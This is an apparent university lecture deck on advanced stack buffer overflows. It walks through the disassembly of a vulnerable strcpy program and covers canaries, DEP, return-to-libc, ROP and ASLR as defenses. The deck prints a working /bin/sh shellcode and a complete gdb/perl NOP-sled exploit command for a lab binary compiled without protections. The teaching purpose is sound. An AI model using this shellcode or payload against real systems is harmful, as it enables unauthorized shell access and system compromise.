Advanced Buffer Overflow

Pattern Recognition and Applications Lab
Advanced Buffer Overflow
Ing. Davide Maiorca, Ph.D.
davide.maiorca@diee.unica.it
Computer Security, A.Y. 2016/2017
Department of Electrical and Electronic Engineering
University of Cagliari, Italy

Contents
- Introduction
- Advanced Attacks
- Analyzing Vulnerable Functions
- Advanced Exploiting
- Shellcode
- Complete Attack
- Countermeasures and Advanced Attacks
- Canaries
- DEP
- Return Oriented Programming and ASLR
- 10K Students Challenge

Introduction

Introduction - Advanced Attacks
- In the previous lectures, we introduced the basics of reverse engineering and buffer overflows.
- However, nothing we did was particularly «dangerous» for the security of the system.
- In this lecture, you will see how dangerous a buffer overflow can be: you will violate the security of a system.
- We will also see the most prominent defense techniques.

Challenge!
- Open the file called «vulnerable» and try to execute it.
- The program needs an argument! However, the argument doesn't seem to influence the behavior of the program.
- The program itself, though, tells you that it's vulnerable.

First Analyses
- As usual, the first step is to disassemble the executable and look for interesting functions.
- Sadly, this file does not contain any user-implemented function apart from main!
- Let's analyze main to retrieve the library functions it calls:
  - printf
  - strcpy
  - puts
- The presence of strcpy is a big problem: this function does not check the size of the destination buffer, so it is potentially vulnerable.
- There are also conditional jumps:
  - cmpl is essentially the same as cmp, with an explicit 32-bit operand size (we won't provide more details).
  - jg jumps based on the result of cmpl: in AT&T syntax, after cmpl A,B it jumps to the destination offset if B is greater than A (signed comparison).

Analysis of main (First Part)
    0804847d <main>:
     804847d: push %ebp
     804847e: mov %esp,%ebp
     8048480: and $0xfffffff0,%esp
     8048483: sub $0x410,%esp
     8048489: cmpl $0x1,0x8(%ebp)
     804848d: jg 80484a2 <main+0x25>
     804848f: movl $0x8048560,(%esp)
     8048496: call 8048330 <printf@plt>
     804849b: mov $0x0,%eax
     80484a0: jmp 80484cb <main+0x4e>
- sub $0x410,%esp allocates space for the locals (1040 bytes, plus the alignment introduced by the preceding and instruction).
- cmpl $0x1,0x8(%ebp) compares an argument of main with the value 1. Note how the arguments of main are above ebp.
- The parameters of main are, usually, int argc, char** argv. In this case, the value of argc is compared to 1.
- Hence, if the number of arguments is greater than 1, jg jumps to 80484a2 (remember that the name of the program is also an argument).
- If the jump is not taken (i.e., if the program receives fewer than 2 arguments), the program prints a message to stdout and quits by jumping to 80484cb.

Analysis of main (Second Part)
     80484a2: mov 0xc(%ebp),%eax
     80484a5: add $0x4,%eax
     80484a8: mov (%eax),%eax
     80484aa: mov %eax,0x4(%esp)
     80484ae: lea 0x10(%esp),%eax
     80484b2: mov %eax,(%esp)
     80484b5: call 8048340 <strcpy@plt>
- The first 4 instructions read argv (at ebp+0xc), move to its second element and store the pointer argv[1] 4 bytes above esp. This is the address of the array that is passed as SECOND parameter to strcpy.
- With lea 0x10(%esp),%eax, the eax register receives the address that is 16 bytes above esp (0x10), i.e., the address of the destination array (which is the FIRST parameter of strcpy).
- mov %eax,(%esp) stores the first parameter of strcpy (i.e., the value of eax) at the location pointed to by esp, and then strcpy is called.
- Hence, strcpy(buf, argv[1]): the address of buf is stored at esp, whilst the pointer argv[1] is stored at esp+4. The array buf itself starts at esp+0x10.
     80484ba: movl $0x804857c,(%esp)
     80484c1: call 8048350 <puts@plt>
     80484c6: mov $0x0,%eax
     80484cb: leave
     80484cc: ret
     80484cd: xchg %ax,%ax
     80484cf: nop
- Loads the address of the string that will be used as parameter of puts, sets the return value to 0 and completes the execution with leave and ret.

Thus
- What did we understand from the two previous slides? The program performs the following:
  - It must receive an argument apart from the name of the program (otherwise it quits).
  - It statically allocates a lot of memory in the stack frame of main (a local variable will be stored there).
  - It calls a function that copies the received argument to a local variable.
- The local variable is an array (look how much space is allocated in memory!).
- The bytes are copied with strcpy, which does not check the size of the destination array.
- Thus, our program is potentially vulnerable.
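The effect of the unchecked copy can be illustrated with a small Python model of the stack frame of main. This is only a sketch: the saved EBP and return address values are made up, the 8 bytes of alignment padding are an assumption of the model, and the helper names are hypothetical.

```python
import struct

BUF_TO_PADDING = 0x410 - 0x10   # 1024 bytes from the start of buf to the padding
PADDING = 8                     # alignment padding (assumed for this model)
FRAME_SIZE = BUF_TO_PADDING + PADDING + 4 + 4   # + saved EBP + return address

SAVED_EBP = 0xBFFFF4A8          # made-up value
RETURN_ADDRESS = 0x08048123     # made-up value


def make_frame() -> bytearray:
    """Layout (low to high): buf, padding, saved EBP, return address."""
    frame = bytearray(FRAME_SIZE)
    struct.pack_into("<I", frame, FRAME_SIZE - 8, SAVED_EBP)
    struct.pack_into("<I", frame, FRAME_SIZE - 4, RETURN_ADDRESS)
    return frame


def unchecked_copy(frame: bytearray, argument: bytes) -> None:
    """Copy like strcpy: stop at the first NUL byte, ignore the buffer size."""
    data = argument.split(b"\x00", 1)[0] + b"\x00"
    n = min(len(data), len(frame))   # the model ends at the return address
    frame[:n] = data[:n]


def return_address(frame: bytearray) -> int:
    """Read back the 4-byte little-endian return address of the model."""
    return struct.unpack_from("<I", frame, FRAME_SIZE - 4)[0]
```

A short argument leaves the return address untouched, while an argument of 1040 bytes replaces it with bytes chosen by whoever supplied the argument.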

Advanced Exploiting

Attack Procedure
- The technique is the same one we saw in the previous lecture:
  - We fill the buffer (the local variable of main) until we reach the memory location pointed to by ebp.
  - Then, the attacker overwrites the return address, located at ebp+4, with a chosen address.
- The problem now is: which address shall we use?
  - We cannot reach other functions now (nor are we interested in doing so).
- Let's see a more effective attack! We will directly inject code that performs an attack!

Attack Procedure (2)
- The attack strategy is therefore a bit different.
- We fill the buffer (the local variable of main) with code that is specifically written to perform an attack.
- The code must be injected so that the buffer is completely filled, and IT MUST STOP RIGHT BEFORE THE RETURN ADDRESS (the code itself should NOT overwrite EBP+4).
- The return address is then overwritten with the starting address of the attack code.
- If everything works, the code is executed!
- If the attack code opens a shell, it is usually called shellcode.

Shellcode
- A shellcode is, as the name itself says, a sequence of instructions that leads to opening a shell.
- By running a shell it is possible to take control of the attacked system (if this is done with root permissions)!
- Such a shell can also be opened on a remote system.
- The code is usually injected as raw bytes, which the processor interprets as instructions during the execution.
- There are many ways (hence, multiple shellcodes) to spawn a shell, depending on:
  - The operating system
  - The executable/processor architecture
  - Whether the shell is remote or not
  - etc.

Part of a Shellcode (Example)
    "\x31\xc0"   /* xor %eax,%eax */
    "\xb0\x01"   /* mov $0x1,%al */
    "\x31\xdb"   /* xor %ebx,%ebx */
    "\xcd\x80";  /* int $0x80 */
- These instructions perform sys_exit(0).
- As a single string: "\x31\xc0\xb0\x01\x31\xdb\xcd\x80"

Buffer Composition
- A first structure of the buffer can be described as follows:
  - Put some random data (size = n)
  - Add the shellcode (size = b)
  - Add other data (size = d; it MUST OVERWRITE BOTH THE ALIGNMENT DATA AND EBP)
- We must cover all the space up to the return address (ebp+4).
- In our case, sub reserves 0x410 bytes and the array starts at esp+0x10, so the distance is 1040 - 16 + alignment = 1024 bytes + alignment.
- How much alignment do we have? To find out:
  - With gdb, add a breakpoint right after and $0xfffffff0,%esp
  - Alignment = ebp - esp at that breakpoint! (In our case, 8 bytes)
- Hence: 1024 + 8 (alignment) = 1032 bytes.
- Add another 4 bytes to cover EBP and 4 more for the return address -> 1040 bytes in total!
- However, this does NOT work:
  - The exact address of the shellcode in memory might not be known in advance.
  - You cannot be sure that the return address is correct.
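The size computation above can be double-checked with a few lines of Python. The constants come from the disassembly of main; the example value of ebp is hypothetical and only chosen so that the alignment is 8 bytes, as measured in the lecture.

```python
LOCALS = 0x410       # from: sub $0x410,%esp
BUF_OFFSET = 0x10    # from: lea 0x10(%esp),%eax
WORD = 4             # size of saved EBP and of the return address


def alignment_padding(ebp: int) -> int:
    """Bytes dropped by `and $0xfffffff0,%esp` when esp equals ebp."""
    return ebp - (ebp & 0xFFFFFFF0)


def payload_size(padding: int) -> int:
    """Bytes from the start of buf up to and including the return address."""
    to_saved_ebp = LOCALS - BUF_OFFSET + padding
    return to_saved_ebp + WORD + WORD


example_ebp = 0xBFFFF468   # hypothetical value observed in gdb
padding = alignment_padding(example_ebp)
print(padding, payload_size(padding))
```

With a different ebp the padding can take any value from 0 to 15, which is why it has to be measured in gdb rather than assumed.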

NOP Sled
- We do not need to know exactly where the shellcode starts.
- We can point to any location of the buffer before the start of the shellcode, provided that the bytes from there to the shellcode are ALL NOP instructions, represented by the \x90 byte.
- This technique is called NOP sled.
- When the processor lands on a sequence of NOPs, it executes these instructions (which do nothing) and reaches the shellcode!
- The best way to perform the attack is, therefore:
  - Fill the whole buffer with NOPs (hence with \x90 bytes), leaving space only for the shellcode and the return address
  - Add the shellcode
  - Add the return address
- We will use a 45-byte shellcode. Since we have to write 1040 bytes in total, we will have: 991 bytes of NOP + 45 bytes of shellcode + 4 bytes of return address.
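The layout described above can be sketched in Python to check the sizes. The shellcode and the return address used here are placeholders (not working values), and build_layout is a hypothetical helper.

```python
TOTAL = 1040     # bytes up to and including the return address
NOP = b"\x90"


def build_layout(shellcode: bytes, return_address: bytes, total: int = TOTAL) -> bytes:
    """Return NOP sled + shellcode + return address, exactly `total` bytes long."""
    if len(return_address) != 4:
        raise ValueError("a 32-bit return address takes 4 bytes")
    sled_length = total - len(shellcode) - len(return_address)
    if sled_length < 0:
        raise ValueError("shellcode does not fit in the available space")
    return NOP * sled_length + shellcode + return_address


placeholder_shellcode = b"\xcc" * 45   # placeholder with the size used in the lecture
placeholder_address = b"RETA"          # placeholder for the 4 address bytes
layout = build_layout(placeholder_shellcode, placeholder_address)
print(len(layout), len(layout) - 45 - 4)
```

Computing the sled length from the total keeps the return address at the right offset even if a shellcode of a different size is used.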

Finalizing the Attack
- We will use gdb to perform the attack (we will see why later on).
- gdb must be executed with a parameter (our attack):
      gdb --args ./vulnerable ARGUMENT
- Careful with the order of the commands!
- We need a Perl script again.
  - To pass its output to gdb, we have to use the $(...script...) notation.
  - As usual, the script is a sequence of print statements.
- As buffer address, we choose 0xbffff048 (obviously, you can pick another one, as long as it falls inside the NOP sled).
- Remember little endianness!
- We use as shellcode:
      "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
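The note on little endianness can be checked with Python's struct module. The sketch below packs the address chosen above and also tests whether an address contains a NUL byte, since strcpy stops copying at the first NUL. The function names are hypothetical.

```python
import struct


def pack_address(address: int) -> bytes:
    """Encode a 32-bit address in little-endian byte order, as x86 stores it."""
    return struct.pack("<I", address)


def survives_strcpy(data: bytes) -> bool:
    """strcpy stops at the first NUL byte, so the data must not contain one."""
    return b"\x00" not in data


packed = pack_address(0xBFFFF048)
print(packed.hex(), survives_strcpy(packed))
```

The least significant byte comes first, so 0xbffff048 becomes the byte sequence 48 f0 ff bf.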

Complete Attack
    gdb --args ./vulnerable $(perl -e 'print "\x90" x 991; print "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"; print "\x48\xf0\xff\xbf"')

Defense Strategies
- Even if this attack is very powerful, it's possible to defend against it:
  - It can be easily detected.
  - The application has not been compiled with the «usual» procedure.
- The source has been compiled with these flags:
      gcc -fno-stack-protector -z execstack -o vulnerable vulnerable.c
- Without these flags, the attack would not work.
- Besides, this attack would not work outside gdb (by default, gdb disables address randomization for the program it runs, so the address of the buffer is predictable).
- Let's see some of the most important defense techniques:
  - Canaries
  - DEP
  - ASLR

Countermeasures and Advanced Attacks

Canaries
- Canaries are values (typically of 4 bytes) that are put between the saved frame pointer and the locals of a function.
- When a stack overflow is performed, these values are overwritten.
- If this happens, the program is immediately stopped!
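The check can be modelled in Python as follows. This is a sketch of the idea only, not of how a compiler implements it: the frame layout, the saved EBP and return address values, and all names are assumptions of the model.

```python
import secrets
import struct


class StackSmashingDetected(Exception):
    """Raised by the model when the canary no longer has its original value."""


def new_canary() -> int:
    """Pick a random 32-bit canary value."""
    return secrets.randbits(32)


def make_frame(buf_size: int, canary: int) -> bytearray:
    """Layout (low to high): buf, canary, saved EBP, return address."""
    saved_ebp, return_address = 0xBFFFF4A8, 0x08048123   # made-up values
    return bytearray(buf_size) + struct.pack("<III", canary, saved_ebp, return_address)


def write_into_buffer(frame: bytearray, data: bytes) -> None:
    """Unchecked write starting at buf (the model ends at the return address)."""
    n = min(len(data), len(frame))
    frame[:n] = data[:n]


def check_canary(frame: bytearray, buf_size: int, canary: int) -> None:
    """Performed before the function returns: stop if the canary has changed."""
    stored = struct.unpack_from("<I", frame, buf_size)[0]
    if stored != canary:
        raise StackSmashingDetected("canary overwritten, aborting")
```

Because the canary sits between the buffer and the return address, a linear overflow cannot reach the return address without changing the canary first.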

Types of Canaries
- Three types:
  - Terminator
  - Random
  - Random XOR
- Terminator: the canary contains a string terminator character.
  - The terminator character stops strcpy, so the attacker cannot write the canary value and keep copying data past it.
  - Nor can the attacker overwrite the canary with a different value, as the protection makes the program stop.
  - Can still be bypassed.
- Random: the canary is set to a random value, which is checked at runtime.
  - There are some performance drawbacks.
- Random XOR: further complicates the generation of the random value.
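The terminator case can be illustrated with a strcpy-like copy in Python. The canary value 0x000aff0d is the one commonly cited for terminator canaries and is used here as an assumption; the buffer size and the payload are hypothetical.

```python
import struct

TERMINATOR_CANARY = struct.pack("<I", 0x000AFF0D)   # commonly cited value (assumption)
BUF_SIZE = 16                                       # hypothetical buffer size


def strcpy_like(source: bytes) -> bytes:
    """Return the bytes strcpy would write: everything up to the first NUL, included."""
    end = source.find(b"\x00")
    return source + b"\x00" if end < 0 else source[: end + 1]


# The attacker tries to rewrite the canary with its own value and then
# continue with a new saved EBP and a new return address.
payload = b"A" * BUF_SIZE + TERMINATOR_CANARY + b"BBBB" + b"\x48\xf0\xff\xbf"
written = strcpy_like(payload)
print(len(payload), len(written))
```

The copy ends at the NUL byte inside the canary, so the bytes meant for the saved EBP and the return address are never written.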

DEP
- Acronym for Data Execution Prevention.
- It enforces the rule that a memory location that can be written (hence, with flag W) cannot also be executed.
- The execution flag is removed from the writable part of the stack.
- Therefore, our exploit would not work!
  - We write data on the stack...
  - ...and we cannot execute them!
- Is it possible to bypass this?
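The rule can be expressed as a toy permission model in Python. The region names and their flags are illustrative assumptions, not the memory map of the lecture's binary.

```python
from enum import Flag, auto


class Perm(Flag):
    R = auto()
    W = auto()
    X = auto()


# Illustrative regions of a process protected by DEP.
REGIONS = {
    "text": Perm.R | Perm.X,    # program code: executable, not writable
    "stack": Perm.R | Perm.W,   # stack: writable, not executable
}


def violates_dep(perm: Perm) -> bool:
    """A region violates the rule if it is both writable and executable."""
    return bool(perm & Perm.W) and bool(perm & Perm.X)


def can_execute(region: str) -> bool:
    """Injected bytes can run only if their region has the X flag."""
    return bool(REGIONS[region] & Perm.X)


print(can_execute("stack"), can_execute("text"))
```

A stack that is readable, writable and executable at the same time is exactly the situation the rule forbids.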

Return-To-Libc
- With DEP you cannot run the code you injected into the stack.
- But what happens if you manage to «reconstruct» a shellcode during the execution of the program?
- The key question is: which code can the defender not prevent from being executed?
- A possible answer is given by library functions.
  - Also called libc functions
  - Example: system(), exit(), execl()
- Key idea: constructing an artificial stack frame by injecting the address of the library function, as well as its parameters and return address.
- You can also chain these stack frames to build a sequence of function calls!

Return-To-Libc - Artificial Stack
- The key idea is that we overwrite the return address with the address of a library function (in this case, system, which takes the /bin/sh parameter as input).
- However, to return to a function that uses parameters, we have to inject:
  - A) The address of system
  - B) A DUMMY return address
  - C) The parameter of system
- This is because system is reached through a ret and not through a call instruction, so no return address is pushed for it.
- After system is called, its parameter must be found 8 bytes above the slot where the old EBP is saved (i.e., at ebp+8 inside system)!
    Before system is called        After system is called
    (higher addresses first)
    «/bin/sh»                      «/bin/sh»
    DUMMY return                   DUMMY return
    system address                 OLD EBP
    Random data                    Random data
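The artificial stack can be written down as a byte layout in Python. All three addresses below are made-up placeholders (the real ones depend on the target process), and the offset of 1036 bytes assumes the stack frame analyzed earlier in this lecture (1024 bytes of buffer, 8 of alignment, 4 of saved EBP).

```python
import struct

OFFSET_TO_RETURN = 1036     # assumed: 1024 (buffer) + 8 (alignment) + 4 (saved EBP)
SYSTEM_ADDRESS = 0xB7E5F060   # hypothetical address of system
DUMMY_RETURN = 0x42424242     # dummy return address used by system
BINSH_ADDRESS = 0xB7F80A0F    # hypothetical address of a "/bin/sh" string


def build_fake_frame(offset: int, function: int, dummy: int, argument: int) -> bytes:
    """Filler, then A) function address, B) dummy return, C) parameter."""
    return b"A" * offset + struct.pack("<III", function, dummy, argument)


fake = build_fake_frame(OFFSET_TO_RETURN, SYSTEM_ADDRESS, DUMMY_RETURN, BINSH_ADDRESS)
print(len(fake))
```

The three words follow the order A, B, C given above: the function address replaces the return address of main, and the parameter ends up two words above it.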

Return Oriented Programming
- It's the evolution of return-to-libc.
- Instead of using whole library functions, we use small pieces of code (also taken from library functions) that all end with a ret instruction, often preceded by pop instructions. This lets us control esp and apply what we saw in the previous slide to multiple pieces of code.
- The code is legitimate, as it already belongs to the program and is marked as executable!
- If you manage to combine multiple pieces of code (called ROP gadgets), you can create a custom shellcode!
- This completely bypasses DEP.
- It is one of the most advanced attack techniques.

Return Oriented Programming - Example
[Figure: stack layout holding &gadget1, &gadget2 and &gadget3; the gadgets shown end with ret.]
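How a chain of gadget addresses drives the execution can be shown with a toy interpreter in Python. Everything here is an assumption made for illustration: the gadget addresses, the three gadgets and the two-register machine are invented, and no real binary is involved.

```python
def pop_eax(regs, stack):
    regs["eax"] = stack.pop(0)   # pop eax: take the next stack word


def pop_ebx(regs, stack):
    regs["ebx"] = stack.pop(0)   # pop ebx: take the next stack word


def add_eax_ebx(regs, stack):
    regs["eax"] = (regs["eax"] + regs["ebx"]) & 0xFFFFFFFF


# Hypothetical gadget addresses; every gadget ends with ret.
GADGETS = {
    0x1000: ("pop eax; ret", pop_eax),
    0x2000: ("pop ebx; ret", pop_ebx),
    0x3000: ("add eax, ebx; ret", add_eax_ebx),
}


def run_chain(chain, gadgets):
    """Simulate ret: pop the next address from the stack and run that gadget."""
    regs = {"eax": 0, "ebx": 0}
    stack = list(chain)          # index 0 is the top of the stack
    trace = []
    while stack:
        address = stack.pop(0)
        if address not in gadgets:
            break                # not a gadget: the toy machine stops
        name, action = gadgets[address]
        trace.append(name)
        action(regs, stack)
    return regs, trace


# Stack contents: gadget addresses interleaved with the data they pop.
chain = [0x1000, 40, 0x2000, 2, 0x3000]
regs, trace = run_chain(chain, GADGETS)
print(regs, trace)
```

The attacker writes only addresses and data on the stack; the instructions that run already exist in executable memory.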

ASLR
- A ROP-based attack can be stopped with ASLR (Address Space Layout Randomization).
- To use ROP gadgets, it is necessary to know their position in memory.
- This technique randomizes the position of the stack, the heap and the library functions.
- In this way, the attacker cannot easily retrieve the addresses required by the attack!
- Not invincible, but a very strong protection!
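The effect of randomization on an attacker who hard-codes an address can be sketched in Python. The default base address, the page size, the gadget offset and the number of random bits are illustrative assumptions, not the values of any specific system.

```python
import random

PAGE = 0x1000               # assumed page size
DEFAULT_BASE = 0xB7E00000   # hypothetical base address of a library
GADGET_OFFSET = 0x1A2B      # hypothetical offset of a gadget inside the library


def randomized_base(rng: random.Random, entropy_bits: int) -> int:
    """Shift the library by a random number of pages on each run."""
    return DEFAULT_BASE + rng.randrange(2 ** entropy_bits) * PAGE


def guess_probability(entropy_bits: int) -> float:
    """Chance that a single hard-coded address matches the randomized one."""
    return 1 / 2 ** entropy_bits


rng = random.Random()
bases = {randomized_base(rng, 8) for _ in range(5)}
print(sorted(hex(base + GADGET_OFFSET) for base in bases))
print(guess_probability(8))
```

The offset of the gadget inside the library does not change, so leaking a single library address is enough to recompute all the others; this is one reason why the protection is strong but not invincible.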

10K Students Challenge
- A set of lectures that teach students the basics of computer security and binary analysis.
- Goal: teaching security to 10000 students all over Europe.
- Sponsored by Vrije Universiteit Amsterdam.
- A lot of European universities joined the project.
- On the official website you will find challenges that are similar to (but harder than) the ones we saw in this course.
- There are also YouTube videos.
  - The videos are in English, explained by prof. Herbert Bos.
- You can find the material on http://10kstudents.eu/

WARGAMES!
- Really interested in reverse engineering? You can improve your skills with wargames.
  - Hacking games where you have to exploit more and more complex vulnerabilities to reach the next levels.
- There are many wargames related to various vulnerabilities.
- A very popular one for reverse engineering is http://smashthestack.org/
- For every challenge you win, you can add your name to a public repository of winners!
  - Use yourname@pralabinfosec17